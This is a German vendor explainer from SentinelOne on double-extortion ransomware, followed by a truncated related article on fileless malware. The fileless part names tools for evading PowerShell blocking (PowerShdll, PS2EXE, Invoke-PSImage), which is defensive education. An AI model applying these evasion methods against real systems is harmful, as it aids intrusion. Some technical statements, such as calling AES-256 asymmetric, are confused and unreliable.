Header Navigation - DE
Background image for Was ist doppelte Erpressung durch Ransomware?
Cybersecurity 101/Intelligente Bedrohung/Doppelte Erpressung

Was ist doppelte Erpressung durch Ransomware?

Doppelte Erpressungstaktiken erhöhen den Druck auf die Opfer. Verstehen Sie, wie diese Methode funktioniert und welche Strategien es gibt, um ihre Auswirkungen zu mildern.

Autor: SentinelOne

Doppelte Erpressung ist eine Taktik von Ransomware-Angreifern, bei der sie Daten nicht nur verschlüsseln, sondern auch mit deren Veröffentlichung drohen. Dieser Leitfaden erläutert, wie doppelte Erpressung funktioniert, welche Auswirkungen sie für die Opfer hat und welche Strategien zur Prävention es gibt.

Erfahren Sie mehr über die Bedeutung von Datensicherungen und der Planung von Maßnahmen zur Reaktion auf Vorfälle. Das Verständnis der doppelten Erpressung ist für Unternehmen von entscheidender Bedeutung, um ihre sensiblen Informationen zu schützen.

Doppelte Erpressung unterstreicht die zunehmende Raffinesse von Cyber-Bedrohungen und macht deutlich, dass ein ganzheitlicher Ansatz für Cybersicherheit erforderlich ist, der robuste Abwehrmaßnahmen gegen Ransomware, wachsame Datenschutz, und Strategien zur Reaktion auf Vorfälle.

Ein kurzer Überblick über doppelte Erpressung

Doppelte Erpressung ist eine ausgeklügelte Cyber-Bedrohungstaktik, die die Landschaft der Ransomware-Angriffe in den letzten Jahren verändert hat. Bei dieser böswilligen Strategie verschlüsseln Cyberkriminelle nicht nur die Daten des OpfersDaten verschlüsseln, sondern vor der Verschlüsselung auch sensible Informationen stehlen und diese effektiv als Geiseln nehmen. Wenn das Opfer sich weigert, das Lösegeld für die Entschlüsselung seiner Daten zu zahlen, drohen die Angreifer damit, die gestohlenen Informationen öffentlich zu veröffentlichen oder zu verkaufen, wodurch die Einsätze und Folgen des Angriffs noch größer werden.

Doppelte Erpressung tauchte erstmals um 2019 als auffälliger Trend in der Ransomware-Landschaft auf, mit dem Aufkommen bekannter Varianten wie Maze und REvil. Diese Cyberkriminellen erkannten den immensen Wert der Daten, die sie kompromittierten, und begannen, unter Androhung der Veröffentlichung dieser Daten zusätzliche Lösegeldzahlungen zu verlangen, in der Regel in Kryptowährung. Dieser innovative Ansatz erhöhte den finanziellen Druck auf die Opfer erheblich und machte es wahrscheinlicher, dass sie den Erpressungsforderungen nachkommen würden.

Heute sind doppelte Erpressungsangriffe alarmierend weit verbreitet. Cyberkriminelle nutzen sie, um eine Vielzahl von Organisationen anzugreifen, von kleinen Unternehmen über große Konzerne bis hin zu staatlichen Institutionen. Zu den gestohlenen Daten gehören oft sensible Kundeninformationen, geschützte geistige Eigentumsrechte und vertrauliche interne Dokumente, was die potenziellen Folgen einer Veröffentlichung noch schwerwiegender macht.

Um sich gegen doppelte Erpressungsangriffe zu schützen, müssen Organisationen eine umfassende Cybersicherheitsstrategie verfolgen, die eine robuste Erkennung und Prävention von Bedrohungen, regelmäßige Datensicherungen, Schulungen für Mitarbeiter zum Erkennen von Phishing-Versuchen sowie einen klar definierten Plan für die Reaktion auf Vorfälle (Incident Response Plan, IRP).

So funktioniert doppelte Erpressung

Doppelte Erpressung ist eine komplexe und heimtückische Cyberangriffstechnik, die Datendiebstahl mit traditionellen Ransomware-Taktiken kombiniert. Aus technischer Sicht umfasst der Prozess mehrere verschiedene Phasen:

Erster Zugriff und Aufklärung

Angreifer nutzen verschiedene Methoden wie Phishing-E-Mails, Ausnutzung von Software-Schwachstellen oder Diebstahl von Anmeldedaten , um sich ersten Zugang zum Netzwerk des Opfers zu verschaffen. Sobald sie sich im Netzwerk befinden, führen sie eine Erkundung durch, um hochwertige Ziele zu identifizieren und sensible Datenspeicher zu lokalisieren.

Techniken zur Datenexfiltration

Angreifer verwenden fortschrittliche Techniken wie SQL-Injection, Remote File Inclusion oder den Missbrauch legitimer Tools, um sensible Daten aus dem Netzwerk des Opfers zu exfiltrieren. Sie können Datenkomprimierung, Verschlüsselung oder Verschleierung einsetzen, um einer Entdeckung zu entgehen.

Datenklassifizierung und -extraktion

Mithilfe automatisierter Skripte oder manueller Prozesse klassifizieren und extrahieren Angreifer sensible Informationen. Zu diesen Daten können personenbezogene Daten (PII), Finanzunterlagen, geistiges Eigentum oder vertrauliche Dokumente umfassen. Angreifer können Datenanalyse- und Indizierungstechniken einsetzen, um wertvolle Daten effizient zu lokalisieren.

Datenbereitstellung und Tarnung

Die exfiltrierten Daten werden in versteckten oder weniger überwachten Bereichen des Netzwerks zwischengespeichert, um eine Entdeckung zu vermeiden. Angreifer können Verschlüsselung oder Steganografie einsetzen, um die Existenz der gestohlenen Daten zu verschleiern und unauffällig zu bleiben.

Datenverschlüsselung mit starken Algorithmen

Nach der Exfiltration starten die Angreifer die Ransomware-Komponente. Sie verwenden robuste Verschlüsselungsalgorithmen wie AES-256, um wichtige Dateien und Systeme im Netzwerk des Opfers zu verschlüsseln. Diese Verschlüsselung ist in der Regel asymmetrisch, mit einem öffentlichen Schlüssel für die Verschlüsselung und einem privaten Schlüssel, der vom Angreifer für die Entschlüsselung verwendet wird.

Lösegeldforderung und Forderung nach Kryptowährung

Die Angreifer senden eine Lösegeldforderung, oft in Form einer Textdatei oder eines Bildes, an die Systeme des Opfers. Diese Nachricht enthält Details zur Lösegeldforderung, Zahlungsanweisungen und eine Frist. Um anonym zu bleiben, verlangen Angreifer in der Regel die Zahlung in Kryptowährungen wie Bitcoin oder Monero.

Doppelte Erpressungsbenachrichtigung

Bei einer doppelten Erpressung informieren die Angreifer das Opfer zusätzlich zur herkömmlichen Lösegeldforderung darüber, dass sie sensible Daten exfiltriert haben. In dieser Benachrichtigung werden die Folgen einer Nichtbefolgung hervorgehoben. Angreifer können Beweise für den Datendiebstahl vorlegen, z. B. Dateilisten oder Ausschnitte, um ihre Behauptungen zu untermauern.

Drohungen mit Datenveröffentlichung

Die Angreifer drohen, die gestohlenen Daten im Internet oder in Untergrundforen zu veröffentlichen, wenn das Lösegeld nicht innerhalb der festgelegten Frist gezahlt wird. Diese Drohung erhöht den Druck auf das Opfer, die Lösegeldforderungen zu erfüllen, da die Offenlegung der Daten zu rechtlichen Konsequenzen, Bußgeldern und Reputationsschäden führen kann.

Zahlungsüberprüfung und Kommunikation

Um die Nachverfolgung der Zahlung und die Entschlüsselung zu erleichtern, geben die Angreifer dem Opfer eine eindeutige Bitcoin-Wallet-Adresse an, an die es das Lösegeld senden soll. Nach Erhalt der Zahlung überprüfen sie diese in der Blockchain und kommunizieren mit dem Opfer über verschlüsselte Kanäle.

Lieferung des Entschlüsselungscodes

Nach erfolgreicher Zahlungsüberprüfung liefern die Angreifer dem Opfer den Entschlüsselungscode. Dieser Schlüssel ist erforderlich, um die Dateien und Systeme zu entschlüsseln, die während der Ransomware-Phase verschlüsselt wurden. Die Angreifer stellen möglicherweise Entschlüsselungstools oder Anweisungen zur Verwendung des Schlüssels zur Verfügung.

Bereinigung nach dem Angriff

Nach Erhalt des Lösegelds entfernen die Angreifer möglicherweise ihre Präsenz aus dem Netzwerk des Opfers und löschen alle Tools, Hintertüren oder Spuren des Angriffs. Es gibt jedoch keine Garantie dafür, dass sie nicht für weitere Erpressungen oder Angriffe zurückkehren.

Reaktion und Schadensbegrenzung

Unternehmen, die mit einer doppelten Erpressung konfrontiert sind, müssen wichtige Entscheidungen darüber treffen, ob sie das Lösegeld zahlen oder nach Alternativen suchen. Außerdem müssen sie den Vorfall den Strafverfolgungsbehörden melden und Maßnahmen zur Reaktion auf den Vorfall einleiten, darunter die Wiederherstellung des Systems und die Verstärkung der Sicherheitsmaßnahmen, um künftige Angriffe zu verhindern.

Verbessern Sie Ihre Threat Intelligence

Erfahren Sie, wie der SentinelOne-Service WatchTower zur Bedrohungssuche mehr Erkenntnisse liefert und Ihnen hilft, Angriffe abzuwehren.

Mehr erfahren

Anwendungsfälle von doppelter Erpressung

Doppelte Erpressungsangriffe sind zu einer bedrohlichen Gefahr in der Cybersicherheit geworden und veranlassen Unternehmen dazu, ihre Abwehrmaßnahmen zu verstärken, um die mit dieser heimtückischen Taktik verbundenen Risiken zu mindern. Hier sind einige reale Anwendungsfälle von doppelter Erpressung, ihre Bedeutung und die Maßnahmen, die Unternehmen ergreifen, um sich gegen diese Risiken zu schützen:

Der Maze-Ransomware-Angriff

Maze Ransomware-Betreiber waren Pioniere der Doppel-Erpressungstechnik. Sie nahmen Unternehmen ins Visier, verschlüsselten deren Daten und drohten dann, sensible Informationen online zu veröffentlichen, wenn kein Lösegeld gezahlt würde.

  • Bedeutung – Dieser Angriff erregte große Aufmerksamkeit und machte die doppelte Erpressung bekannt, wodurch die möglichen Folgen einer Nichtbefolgung deutlich wurden.
  • Sicherheitsmaßnahmen – Seitdem haben Unternehmen ihren Fokus verstärkt auf Cybersicherheit gelegt, umfassende Backup-Strategien eingeführt, überwachen Datenlecks und verbessern ihre Fähigkeiten zur Reaktion auf Vorfälle, um Maze-ähnlichen Bedrohungen entgegenzuwirken.

Die REvil-Ransomware-Gruppe

REvil ist bekannt für ihre aggressiven Doppel-Erpressungstaktiken. In einem Fall griffen sie eine renommierte Anwaltskanzlei an, stahlen sensible Kundendaten und drohten mit deren Veröffentlichung.

  • Bedeutung – Dieser Angriff hat gezeigt, dass selbst Branchen, die normalerweise nicht mit hohen Cybersicherheitsrisiken in Verbindung gebracht werden, wie z. B. Rechtsdienstleistungen, anfällig für doppelte Erpressung sind. Er hat die Notwendigkeit umfassender Cybersicherheitsmaßnahmen in allen Branchen unterstrichen.
  • Sicherheitsmaßnahmen – Anwaltskanzleien und ähnliche Unternehmen investieren zunehmend in Schulungen zur Sensibilisierung ihrer Mitarbeiter für Cybersicherheit, führen Multi-Faktor-Authentifizierung (MFA) ein und verbessern die Endpunktsicherheit , um sich vor Angriffen im Stil von REvil zu schützen.

Die Ragnar Locker Ransomware-Kampagne

Ragnar Locker zielte auf große Organisationen ab, insbesondere im Gesundheitswesen. Sie verschlüsselte Dateien, stahl Patientendaten und forderte ein hohes Lösegeld.

  • Bedeutung – Die Gesundheitsbranche stand aufgrund der COVID-19-Pandemie bereits unter Druck, und diese Angriffe belasteten die Ressourcen zusätzlich und weckten Bedenken hinsichtlich der Privatsphäre der Patienten und der Sicherheit kritischer Gesundheitsinfrastrukturen.
  • Sicherheitsmaßnahmen – Gesundheitsorganisationen haben ihre Cybersicherheit durch eine verbesserte Netzwerksegmentierung, die Implementierung robuster Zugriffskontrollen und die Durchführung regelmäßiger Cybersicherheitsbewertungen verstärkt, um doppelte Erpressungsversuche zu vereiteln.

Der DarkTequila-Angriff

DarkTequila war ein Banking-Trojaner, der um Ransomware- und Datendiebstahlkomponenten erweitert wurde. Die Angreifer nahmen Finanzinstitute und Unternehmensnetzwerke ins Visier, verschlüsselten Dateien und entwendeten sensible Daten.

  • Bedeutung – Dieser Angriff zeigte die Anpassungsfähigkeit von Cyberkriminellen, die ihre Taktiken im Laufe der Zeit weiterentwickeln. Insbesondere Finanzinstitute mussten sich mit der wachsenden Bedrohung durch doppelte Erpressung auseinandersetzen.
  • Sicherheitsmaßnahmen – Finanzinstitute implementieren Plattformen zum Austausch von Bedrohungsinformationen ein, verbessern ihre Schulungsprogramme für Mitarbeiter und führen Tabletop-Übungen durch, um sich auf potenzielle doppelte Erpressungsangriffe vorzubereiten.

Cl0p-Ransomware-Gruppe

Die Cl0p hat verschiedene Organisationen, darunter auch Universitäten, ins Visier genommen. Sie verschlüsselte Dateien und drohte, sensible akademische Forschungsdaten online zu veröffentlichen.

  • Bedeutung – Angriffe auf Bildungseinrichtungen verdeutlichen das breite Spektrum der Ziele von doppelter Erpressung. In diesem Fall war der potenzielle Verlust wertvoller Forschungsdaten ein großes Problem.
  • Sicherheitsmaßnahmen – Universitäten und Forschungseinrichtungen verstärken ihre Cybersicherheitsmaßnahmen durch verbesserte E-Mail-Filterung, Datenverschlüsselung und Notfallplanung, um ihr geistiges Eigentum vor Angriffen wie denen von Cl0p zu schützen.

Um sich gegen die Risiken einer doppelten Erpressung zu schützen, ergreifen Unternehmen mehrere proaktive Maßnahmen:

  • Umfassende Backup-Strategien – Regelmäßige Datensicherungen, die vom Netzwerk isoliert sind, sind von entscheidender Bedeutung. Sie stellen sicher, dass Unternehmen ihre Daten wiederherstellen können, ohne Lösegeld zahlen zu müssen.
  • Mitarbeiterschulungen – Schulungen zum Thema Cybersicherheit helfen Mitarbeitern, Phishing-Versuche und andere Social-Engineering-Taktiken zu erkennen, die bei doppelten Erpressungsangriffen zum Einsatz kommen.
  • Endpunktsicherheit – Robuste Endpunkt-Sicherheitslösungen sind für die Erkennung und Verhinderung von Malware-Infektionen unerlässlich.
  • Zugriffskontrollen – Die Umsetzung des Prinzips der geringsten Privilegien (PoLP) stellt sicher, dass Benutzer nur über die für ihre Rolle erforderlichen Mindestzugriffsrechte verfügen.
  • Pläne zur Reaktion auf Vorfälle – Mit klar definierten Plänen zur Reaktion auf Vorfälle können Unternehmen effektiv auf doppelte Erpressungsangriffe reagieren und deren Auswirkungen minimieren.
  • Austausch von Bedrohungsinformationen – Die Zusammenarbeit mit Branchenkollegen und der Austausch von Bedrohungsinformationen können Unternehmen dabei helfen, über neue Bedrohungen und Angriffstechniken auf dem Laufenden zu bleiben.

Fazit

Doppelte Erpressungsangriffe, bei denen Cyberkriminelle nicht nur Daten verschlüsseln, sondern auch damit drohen, sensible Informationen zu veröffentlichen, wenn kein Lösegeld gezahlt wird, haben die Risiken in der aktuellen Bedrohungslandschaft erhöht. Diese Angriffe nutzen die Angst vor Datenlecks und Rufschädigung aus und zwingen viele dazu, Lösegeld zu zahlen, selbst wenn sie über Backups verfügen.

Anwendungsfälle von doppelter Erpressung aus der Praxis unterstreichen die entscheidende Bedeutung der Cybersicherheit für Unternehmen aller Branchen. Da Angreifer ihre Taktiken ständig verfeinern, müssen Unternehmen wachsam bleiben, ihre Sicherheitsmaßnahmen anpassen und eine proaktive Haltung einnehmen, um ihre Daten, ihren Ruf und ihren Gewinn zu schützen.

"

Häufig gestellte Fragen zu doppelter Erpressung

Bei Ransomware mit doppelter Erpressung verschlüsseln Angreifer Ihre Daten und stehlen vor der Verschlüsselung Kopien davon. Sie drohen damit, Ihre sensiblen Daten öffentlich zu machen, wenn Sie das Lösegeld nicht zahlen. Dies verschafft ihnen zusätzlichen Einfluss, denn selbst wenn Sie Backups haben, um verschlüsselte Dateien wiederherzustellen, können sie Ihre gestohlenen Daten dennoch veröffentlichen. Das ist viel gefährlicher als herkömmliche Ransomware-Angriffe.

Zunächst verschaffen sich die Angreifer über Phishing-E-Mails oder Schwachstellen Zugang zu Ihrem Netzwerk. Sie durchsuchen Ihre Systeme nach wertvollen Daten. Bevor sie irgendetwas verschlüsseln, kopieren sie sensible Dateien auf ihre eigenen Server.

Anschließend setzen sie Ransomware ein, um Ihre Dateien zu verschlüsseln, und hinterlassen eine Lösegeldforderung. Wenn Sie nicht zahlen, veröffentlichen sie Ihre gestohlenen Daten im Dark Web.

Der Angriff verläuft in sieben Hauptphasen. Phase eins ist die Identifizierung und Erkundung des Opfers. Phase zwei ist der Zugriff auf Ihre Infrastruktur über RDP oder Phishing. Phase drei umfasst die Einrichtung von Fernzugriffstools wie CobaltStrike.

Phase vier ist das Scannen des Netzwerks, um Ihre Systeme zu kartieren. Phase fünf ist die laterale Bewegung durch Ihr Netzwerk. Phase sechs ist die Datenexfiltration und Phase sieben ist die Verschlüsselung und die Forderung von Lösegeld.

Nein, Backups allein können nicht vor doppelten Erpressungsangriffen schützen. Backups helfen Ihnen zwar bei der Wiederherstellung verschlüsselter Dateien, schützen Sie jedoch nicht vor Datendiebstahl. Angreifer haben sich darauf eingestellt, Backup-Strategien zu umgehen, indem sie zuerst Daten stehlen.

Sie benötigen einen mehrschichtigen Sicherheitsansatz. Verwenden Sie Firewalls, E-Mail-Sicherheit und Endpunkt-Erkennungstools, um den ersten Zugriff zu verhindern. Implementieren Sie Netzwerksegmentierung, um die Bewegungsfreiheit von Angreifern einzuschränken. Setzen Sie Tools zum Schutz vor Datenexfiltration ein, die den ausgehenden Datenverkehr überwachen. Schulen Sie Ihre Mitarbeiter darin, Phishing-Versuche zu erkennen.

Verwenden Sie Multi-Faktor-Authentifizierung und Zugriffskontrollen. Regelmäßige Sicherheitsaudits und Schwachstellenanalysen sind ebenfalls von entscheidender Bedeutung. Überwachen Sie den Netzwerkverkehr kontinuierlich auf verdächtige Aktivitäten.

Das Gesundheitswesen, die Fertigungsindustrie und Finanzdienstleister sind die Hauptziele. Angreifer nehmen Organisationen mit wertvollen Daten wie Krankenhäuser ins Visier, da diese eine geringe Toleranz für Ausfallzeiten haben. Sie stehlen personenbezogene Daten, Krankenakten, Sozialversicherungsnummern und Finanzdaten.

Kundendatenbanken, proprietärer Quellcode und interne Kommunikation sind ebenfalls Ziele. Angreifer bevorzugen Organisationen, die sich hohe Lösegeldzahlungen leisten können.

Verwenden Sie Datenverschlüsselung, um sensible Informationen auch im Falle eines Diebstahls zu schützen. Implementieren Sie Tools zur Verhinderung von Datenverlusten, um unbefugte Übertragungen zu erkennen. Setzen Sie Lösungen zur Erkennung und Reaktion auf Endpunkten ein. Erstellen Sie Pläne zur schnellen Eindämmung von Vorfällen. Verwenden Sie Netzwerksegmentierung, um Schäden zu begrenzen.

Regelmäßige Backup-Tests und eine sichere externe Speicherung sind unerlässlich. Überwachen Sie kontinuierlich auf Anzeichen für Kompromittierungen. Zahlen Sie kein Lösegeld – es gibt keine Garantie dafür, dass die Angreifer ihr Wort halten.

Erfahren Sie mehr über Intelligente Bedrohung

Was ist ein Honeypot? Definition, Arten und VerwendungszweckeIntelligente Bedrohung

Was ist ein Honeypot? Definition, Arten und Verwendungszwecke

Entdecken Sie in diesem umfassenden Leitfaden, was ein Honeypot ist. Erfahren Sie mehr über seine Arten, Vorteile und Einsatztechniken. Entdecken Sie Beispiele aus der Praxis, Herausforderungen und Tipps für die Honeypot-Sicherheit in Unternehmen.

Mehr lesen
Was ist ein AitM-Angriff (Adversary-in-the-Middle)?Intelligente Bedrohung

Was ist ein AitM-Angriff (Adversary-in-the-Middle)?

Adversary-in-the-Middle-Angriffe (AiTM) manipulieren die Kommunikation für böswillige Zwecke. Machen Sie sich mit deren Taktiken vertraut und lernen Sie, wie Sie sich dagegen schützen können.

Mehr lesen
Was ist ein Bedrohungsakteur? Arten und BeispieleIntelligente Bedrohung

Was ist ein Bedrohungsakteur? Arten und Beispiele

Das Verständnis der Bedrohungsakteure ist für eine wirksame Verteidigung von entscheidender Bedeutung. Informieren Sie sich über die Motive und Taktiken verschiedener Cyber-Gegner.

Mehr lesen
Was ist dateilose Malware? Wie kann man sie erkennen und verhindern?Intelligente Bedrohung

Was ist dateilose Malware? Wie kann man sie erkennen und verhindern?

Dateilose Malware funktioniert ohne herkömmliche Dateien, wodurch sie schwer zu erkennen ist. In diesem Leitfaden wird erläutert, wie dateilose Malware funktioniert, wie sie Infektionen verursacht und welche Risiken sie für Unternehmen birgt. Erfahren Sie mehr über wirksame Erkennungs- und Präventionsstrategien zur Bekämpfung dieser heimlichen Bedrohung. Das Verständnis von dateiloser Malware ist für die Verbesserung der Cybersicherheit von entscheidender Bedeutung. Der SentinelOne H1 2018 Enterprise Risk Index Report zeigt, dass dateilose Angriffe zwischen Januar und Juni um 94 % zugenommen haben. PowerShell-Angriffe stiegen von 2,5 Angriffen pro 1.000 Endpunkten im Mai 2018 auf 5,2 Angriffe pro 1.000 Endpunkten im Juni. In den letzten Jahren haben sich Angreifer zunehmend fileless Malware als hochwirksame Alternative zugewandt. Was ist dateilose Malware? Dateilose Malware ist bösartiger Code, der keine ausführbare Datei im Dateisystem des Endgeräts benötigt, außer denen, die bereits vorhanden sind. Sie wird in der Regel in einen laufenden Prozess eingeschleust und nur im RAM ausgeführt. Dies macht es für herkömmliche Antivirensoftware und andere Endpunkt-Sicherheitsprodukte-Produkte, da sie nur wenig Speicherplatz beansprucht und keine Dateien zum Scannen vorhanden sind. Ein Beispiel , das die USA, Kanada und Europa betraf, starteten Angreifer eine Spam-Kampagne, bei der sie bösartige Word-Dokumente versendeten, die beim Öffnen Makros ausführten und dabei dateilose Malware verbreiteten. In Fällen wie diesem bezieht sich "dateilos" darauf, dass Angreifer Windows PowerShell nutzen, um eine ausführbare Datei direkt in den Speicher zu laden, anstatt sie auf die Festplatte zu schreiben (wo sie von durchschnittlichen Malware-Scannern erkannt werden kann). Es gibt viele andere Möglichkeiten, Code auf einem Gerät auszuführen, ohne ausführbare Dateien zu verwenden. Diese nutzen oft Systemprozesse, die vom Betriebssystem zur Verfügung gestellt werden und als vertrauenswürdig gelten. Einige Beispiele hierfür sind: VBScript JScript Batch-Dateien PowerShell Windows Management Instrumentation (WMI) Mshta und rundll32 (oder andere von Windows signierte Dateien, die schädlichen Code ausführen können) In Dokumenten versteckte Malware ist ebenfalls eine dateilose Attacke Neben dem dateilosen Angriff, bei dem Systemdateien zum Ausführen von Schadcode verwendet werden, gibt es eine weitere häufige und als dateilos geltende Angriffsart: in Dokumenten versteckte Malware. Obwohl solche Datendateien keinen Code ausführen dürfen, gibt es Schwachstellen in Microsoft Office und PDF-Readern, die Angreifer ausnutzen können, um die Ausführung von Code zu erreichen. Beispielsweise könnte ein infiziertes Dokument einen bösartigen PowerShell -Befehl auslösen. Es gibt auch einige integrierte Funktionen, die die Ausführung von Code innerhalb von Dokumenten ermöglichen, wie z. B. Makros und DDE-Angriff. Wie funktioniert dateilose Malware? Die häufigste Form von dateiloser Malware in freier Wildbahn tritt auf, wenn ein Opfer auf einen Spam-Link in einer E-Mail oder auf einer betrügerischen Website klickt. Dieser Link oder diese Website lädt dann die Flash-Anwendung und implementiert einen entsprechenden Exploit, um den Computer des Benutzers zu infizieren. Anschließend verwendet die Malware Shellcode, um einen Befehl auszuführen, mit dem sie die Nutzlast ausschließlich im Speicher herunterladen und ausführen kann. Das bedeutet, dass es keine Spuren ihrer Aktivität gibt. Je nach den Zielen des Hackers kann die Malware sensible Daten kompromittieren, den Computer des Opfers beschädigen oder andere schädliche Aktionen wie Datendiebstahl und Verschlüsselung durchführen. Hacker geben sich in der Regel als vertrauenswürdige oder bekannte Quelle aus, um das Opfer davon zu überzeugen, auf den von ihnen bereitgestellten Link zu klicken. Dies ist besonders effektiv in formellen Umgebungen, in denen das Opfer glaubt, dass ein Mitarbeiter oder eine Führungskraft seines Unternehmens Kontakt mit ihm aufnimmt. Die wichtigste Erkenntnis hierbei ist, dass diese Art von Malware-Angriffen auf Social Engineering angewiesen ist, um erfolgreich zu sein. Merkmale von dateiloser Malware Diese Art von Schadsoftware nutzt Programme, die sich bereits auf dem Computer befinden. Ihr Verhalten kann von heuristischen Scannern nicht erkannt werden, und sie hat keinen identifizierbaren Code oder Signatur. Darüber hinaus befindet sich dateilose Malware im Speicher des Systems. Um zu funktionieren, nutzt sie die Prozesse des infizierten Betriebssystems aus. Fortgeschrittenere dateilose Malware kann auch mit anderen Arten von Malware kombiniert werden, um komplexe Cyberangriffe zu ermöglichen. Unter den richtigen Umständen kann sie sogar Whitelisting und Sandboxing umgehen. Phasen eines fileless Malware-Angriffs Ein fileless Malware-Angriff ist in seiner Funktionsweise ziemlich einzigartig. Das Verständnis seiner Funktionsweise kann einem Unternehmen helfen, sich in Zukunft vor fileless Malware-Angriffen zu schützen. Lassen Sie uns untersuchen, was Sie wissen sollten. 1. Malware verschafft sich Zugriff auf den Computer Bevor ein Angreifer seinen Malware-Angriff vollständig ausführen kann, muss er sich zunächst Zugriff auf den Computer des Opfers verschaffen, häufig mithilfe einer Phishing oder Social-Engineering-Taktik. Danach kann er mit den weiteren Schritten des Prozesses beginnen. Eine weitere Möglichkeit, sich Zugang zum Computer des Opfers zu verschaffen, ist der Diebstahl von Anmeldedaten. Durch den Diebstahl von Anmeldedaten erhält der Hacker freien Zugang zum System und kann diese Informationen dann nutzen, um auf andere Umgebungen zuzugreifen. Der erste Zugriff auf den Computer verschafft dem Hacker beispielsweise möglicherweise nicht die erforderlichen Berechtigungen, aber er kann sich die Anmeldedaten beschaffen, um an diese Daten zu gelangen. 2. Das Programm etabliert Persistenz Nach dem Zugriff richtet die Malware eine Hintertür ein, über die der Hacker nach Belieben auf den Computer zugreifen kann. Der Hauptzweck dieser Maßnahme besteht darin, den Zugriff auf das Gerät nicht zu verlieren, damit die Informationsbeschaffung über einen langen Zeitraum fortgesetzt werden kann. 3. Datenexfiltration Die letzte Phase ist die Datenexfiltration. Nachdem der Angreifer die benötigten Informationen gefunden hat, werden die Daten in eine andere Umgebung exfiltriert. Auf diese Weise können sie über einen langen Zeitraum hinweg unbemerkt sensible Daten beschaffen und so oft wie nötig wiederholt vorgehen. Gängige Techniken fileless Malware fundiertes verständnis der verschiedenen techniken hilft ihnen dabei, angriffe in zukunft zu erkennen. hier sind sechs arten von malware, die dateilose funktionen nutzen können, um fähigkeit zur umgehung erkennung verbessern: 1. Speicherresidente Malware Durch die Nutzung des Speicherplatzes einer echten Windows-Datei können Angreifer bösartigen Code laden, der so lange inaktiv bleibt, bis er aktiviert wird. Der dateilose Aspekt besteht darin, dass herkömmliche Antivirensoftware, die Dateien scannt, die Malware nicht erkennen kann. 2. Rootkits Da Rootkits nicht in einer Datei, sondern im Kernel existieren, verfügen sie über leistungsstarke Fähigkeiten, um einer Erkennung zu entgehen. Sie sind zu 100 % dateilos, fallen aber aufgrund ihrer Weiterentwicklung in diese Kategorie. 3. Windows-Registrierungs-Malware Wie im oben genannten Beispiel nutzen diese Angriffe die Windows-Registrierungsdatenbank, in der Low-Level-Einstellungen für verschiedene Anwendungen gespeichert sind. Die Malware basiert auf Code, der über eine Datei ausgeführt wird, aber diese Datei ist so eingestellt, dass sie sich nach der Ausführung selbst zerstört, sodass die Malware als dateilos bestehen bleibt. 4. Falsche Anmeldedaten Wie der Name schon sagt, beinhaltet dieser Angriff die Verwendung kompromittierter Anmeldedaten eines legitimen Benutzers (d. h. gestohlene Benutzernamen und Passwörter). Nachdem der Hacker Zugriff auf das System erlangt hat, implementiert er einen Shellcode, um seinen Angriff auf den Rechner zu erleichtern. In extremen Fällen kann er sogar Code in der Registrierungsdatenbank platzieren, um sich dauerhaften Zugriff auf den Computer zu verschaffen. 5. Dateilose Ransomware Für diejenigen, die mit dieser Art von Malware nicht vertraut sind: Ransomware ist ein Schadprogramm, das Hacker einsetzen, um Geld von ihren Opfern zu erpressen. Oft verschlüsseln sie sensible Daten und drohen, diese zu löschen, wenn nicht eine bestimmte Summe Geld gezahlt wird, häufig in Form von Kryptowährung. Bei dieser Art von dateilosen Angriffen können Hacker angreifen, ohne jemals etwas auf die Festplatte des Computers zu schreiben. Das macht es schwierig, den Angriff zu erkennen, bis es zu spät ist. 6. Exploit-Kits Angreifer nutzen eine Sammlung von Tools, sogenannte Exploit-Kits, um Schwachstellen auf dem Computer des Opfers auszunutzen. Diese Angriffe beginnen in der Regel wie ein typischer dateiloser Malware-Angriff, d. h., sie verleiten den Benutzer oft dazu, auf einen betrügerischen Link zu klicken. Sobald das Programm in den Computer eingedrungen ist, kann das Exploit-Kit das System scannen, um Schwachstellen zu ermitteln, die ausgenutzt werden können, und dann eine Reihe spezifischer Exploits zum Einsatz bringen. Oftmals bleibt die Malware unentdeckt und verschafft sich umfassenden Zugriff auf das System und die Daten. Das Problem für Unternehmen Einer der Gründe, warum dateilose Malware so attraktiv ist, besteht darin, dass Sicherheitsprodukte die Systemdateien oder Software, die bei dieser Art von Angriffen verwendet werden, nicht einfach blockieren können. Wenn beispielsweise ein Sicherheitsadministrator PowerShell blockieren würde, hätte dies negative Auswirkungen auf die IT-Wartung. Das Gleiche gilt für das Blockieren von Office-Dokumenten oder Office-Makros, was wahrscheinlich noch größere Auswirkungen auf die Geschäftskontinuität hätte. Der geringere Speicherbedarf und das Fehlen "fremder" ausführbarer Dateien, die gescannt werden könnten, machen es für herkömmliche Antivirenprogramme und andere Endpoint-Sicherheitsprodukte schwierig, diese Art von Angriffen zu erkennen oder zu verhindern. Das Problem für Anbieter Unternehmen sind sich bewusst, dass das Fehlen eines wirksamen Schutzes vor dateiloser Malware ihre Organisation extrem anfällig machen könnte. Infolgedessen gerieten Sicherheitsanbieter unter Druck, dieser wachsenden Bedrohung zu begegnen, und entwickelten alle möglichen Patches, um ihre "Datei-losen Angriffe" abzudecken (oder zu demonstrieren). Leider sind viele dieser Versuche, das Problem zu lösen, nicht ideal. Hier sind einige der Standardlösungen und warum sie unzureichend sind: Blockieren von PowerShell Wie oben erwähnt, ist PowerShell zu einem unverzichtbaren Werkzeug für IT-Teams geworden und hat das alte cmd-Tool von Microsoft als Standard-Befehlszeilenprogramm weitgehend ersetzt. Eine Blockierung würde zu erheblichen Störungen für IT-Teams führen. Noch wichtiger ist jedoch, dass eine Blockierung aus defensiver Sicht sinnlos wäre: Es gibt viele öffentliche Quellen, die erklären, wie man die PowerShell-Ausführungsrichtlinie umgeht und wie man PowerShell.exe auf andere Weise umgehen kann. Um nur einige zu nennen: Führen Sie PowerShell nur mit DLLs aus, mit einem einfachen rundll32-Befehl unter Verwendung von PowerShdll Konvertieren Sie PowerShell-Skripte in andere EXE-Dateien, mit Tools wie PS2EXE Verwenden Sie Malware, die eine eigene Kopie von PowerShell.exe nutzt oder die lokale PowerShell modifiziert, um die Erkennung von PowerShell durch Sicherheitsprodukte zu vermeiden Einbetten Sie ein PowerShell-Skript in die Pixel einer PNG-Datei und generieren Sie einen Einzeiler, um es mit Invoke-PSImageauszuführen. Blockieren von MS Office-Makrodateien Um diesen Angriffsvektor zu beseitigen, hat Microsoft eine Option hinzugefügt hinzugefügt, um Makros als Website-Einstellung zu deaktivieren (ab Office 2016). Da sie jedoch in den meisten Umgebungen weiterhin zugelassen sind, haben Sicherheitsanbieter dieses Problem hauptsächlich auf zwei Arten angegangen: Makros generell blockieren – damit 